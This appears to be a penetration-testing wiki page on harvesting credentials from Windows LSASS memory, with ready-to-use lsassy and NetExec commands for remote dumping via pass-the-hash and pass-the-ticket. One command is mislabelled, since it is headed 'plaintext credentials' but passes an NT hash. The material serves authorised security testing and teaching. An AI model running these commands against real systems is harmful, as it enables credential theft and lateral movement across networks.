LSASS secrets
Theory
The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. With administrative rights only, this material can be harvested (either locally or remotely).
Practice
Lsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.
- several dumping methods: comsvcs.dll, ProcDump, Dumpert
- several authentication methods: like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
- it can be used either as a standalone script, as a NetExec module or as a Python library
- it can interact with a Neo4j database to set BloodHound targets as "owned"
# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS
# With plaintext credentials
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS
# With pass-the-ticket (Kerberos)
lsassy -k $TARGETS
# netexec Module examples
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
netexec smb $TARGETS -k -M lsassy
netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
Recovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context).